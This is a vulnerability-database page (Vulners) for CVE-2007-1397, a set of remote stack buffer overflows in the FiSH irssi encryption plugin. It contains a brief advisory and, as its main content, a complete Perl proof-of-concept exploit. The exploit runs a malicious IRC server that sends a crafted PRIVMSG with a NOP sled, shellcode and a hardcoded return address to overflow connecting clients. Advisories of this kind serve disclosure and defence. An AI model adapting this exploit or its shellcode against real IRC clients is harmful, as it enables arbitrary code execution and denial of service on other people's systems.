Vulners
Lucene search
FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | FiSH-irssi v0.99 Evil ircd Buffer Overflow (CVE-2007-1397) | 18 Apr 201100:00 | – | zdt |
 | CVE-2007-1397 affecting package fish 3.6.2-1 | 12 Jan 202509:15 | – | cbl_mariner |
| CVE-2007-1397 affecting package fish 3.1.2-4 | 12 Jan 202509:15 | – | cbl_mariner |
 | CVE-2007-1397 vulnerabilities | 27 Mar 202516:13 | – | cgr |
 | CVE-2007-1397 | 10 Mar 200722:00 | – | cve |
 | CVE-2007-1397 | 10 Mar 200722:00 | – | cvelist |
 | FiSH-irssi 0.99 - Evil ircd Buffer Overflow | 17 Apr 201100:00 | – | exploitdb |
 | FiSH-irssi 0.99 - Evil ircd Buffer Overflow | 17 Apr 201100:00 | – | exploitpack |
| FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities | 8 Mar 200700:00 | – | exploitpack |
 | Multiple stack-based buffer overflows in the (1) ExtractRnick and (2) decrypt_topic_332 functions in FiSH allow remote attackers to execute arbitrary code via long strings. | 1 Oct 202523:10 | – | mscve |
10
source: https://www.securityfocus.com/bid/22880/info
FiSH is prone to multiple remote buffer-overflow vulnerabilities because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial of service.
# FiSH IRC encryption evil ircd PoC exploit.
# Abuses CVE-2007-1397
# Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin.
# Runs arbitrary code which which in this case shuts down irssi.
# Tested on my own compiled FiSH with irssi/fedora/x86
# There are a lot more problems like this one, you should /unload fish
# Caleb James DeLisle - cjd
use Socket;
$retPtr = "\x60\xef\xff\xbf";
# Pirated from some guy called gunslinger_
$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
$code = "\x90" x 120 . $exit1code . $retPtr;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";
bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667";
listen(SOCKET,5) or die "Couldn't listen on port";
while(accept(CLIENT,SOCKET)){
sleep 1;
select((select(CLIENT), $|=1)[0]);
print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n";
}
close(SOCKET);Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Mar 2007 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 210
EPSS0.34944